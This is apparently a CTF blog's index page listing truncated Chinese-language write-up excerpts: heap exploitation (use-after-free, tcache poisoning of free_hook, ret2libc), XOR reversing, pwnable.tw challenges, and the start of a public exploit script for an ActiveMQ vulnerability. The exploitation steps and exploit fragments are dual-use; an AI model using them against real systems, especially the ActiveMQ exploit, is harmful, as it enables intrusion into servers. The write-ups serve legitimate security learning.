nyyyddddn

唉咱好菜，就出了一题 HappyCTF123456789101112131415161718192021222324252627282930public vulnvuln proc nearbuf= byte ptr -110hvar_8= qword ptr -8; __unwind {endbr64push rbpmov rbp, rspsub rsp, 110hlea rax, aNowPlzYouInput ; "Now,plz you input:"mov rdi, rax ; scall ...

pwnElden Ring Ⅱ一个heap manager相关的题目，glibc 2.31，没有pie，包括add edit show delete四个功能，在delete这里有一个uaf 123456789101112131415161718void delete_note(){ unsigned int v0; // [rsp+Ch] [rbp-4h] BYREF printf("Index: "); __isoc99_scanf("%u", &v0); if ( v0 <= 0xF ) { i...

pwnpwn1glibc 2.31 有pie，choice 10能分一个很大的堆块，所以思路是把tcache填满，然后free掉一个大堆块，通过unsortedbin去泄露libc的地址，然后通过tcache bin attack去写free hook为system，再去free掉一块内容为binsh的堆 触发system(/bin/sh) 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616...

reezASMcheckflag可以看出 cmp的逻辑是 异或0x22 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162section .data c db 74, 69, 67, 79, 71, 89, 99, 113, 111, 125, 107, 81, 125, 107, 79, 82, 18, 80, 86, 22, 76, 86, 125, 22, 125, 112, 71, 84, 17,...

pwnone_byte刚刚好能覆盖返回地址一个字节，看了一下返回地址是一个libc的地址，29dxx，把29dxx附件的汇编看了一遍，没有很直接的输出函数，或者是跳转到输出函数的汇编，。那这时候的思路是把一个字节爆破一遍，把有输出的字节全部记录下来，最后发现在 \x89那回到了main函数，把下一位flag输出出来了 12.text:0000000000029D89 48 8B 44 24 08 mov rax, [rsp+98h+var_90].text:0000000000029D8E FF D0 ...

唉，咱好菜，就出了两个题，ghostscript那个题调了半天没调通 Be-an-ActiveMq-Hacker搜了一下 用网上的exp打通了 https://blog.csdn.net/weixin_49125123/article/details/135577221 12345678910111213141516171819202122232425262728293031323334353637import ioimport socketimport sysdef main(ip, port, xml): classname = "org.springframewor...

pwnnc_pwnre一个异或的逻辑, 异或后是一串base64编码，提交解码后的文本就进到shell了 1234a = [0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d]for i in a: print(chr(i ^ 0x10),...

pwn好菜，pwn就出了一个题，堆题做不出 nmanager可以用printf %s泄露libc的地址，然后打ret2libc，n为8刚刚好到rbp那 12345678910111213141516171819202122232425262728unsigned __int64 __fastcall modify(__int64 a1){ char buf[24]; // [rsp+10h] [rbp-20h] BYREF unsigned __int64 v3; // [rsp+28h] [rbp-8h] v3 = __readfsqword(0x28u); do ...

pwnable.tw持续更新 start检查一下保护 和查看每个段的权限发现，栈上有可执行权限 12345678lhj@lhj-virtual-machine:~/Desktop/pwntw/start$ checksec start[*] '/home/lhj/Desktop/pwntw/start/start' Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8...

pwnbasic-overflow 有一个shell函数，栈溢出覆盖返回地址为shell 1234567int __cdecl main(int argc, const char **argv, const char **envp){ char v4[64]; // [rsp+0h] [rbp-40h] BYREF gets(v4, argv, envp); return 0;} 1234int shell(){ return execve("/bin/sh", 0LL, 0LL);} exp 1234567891...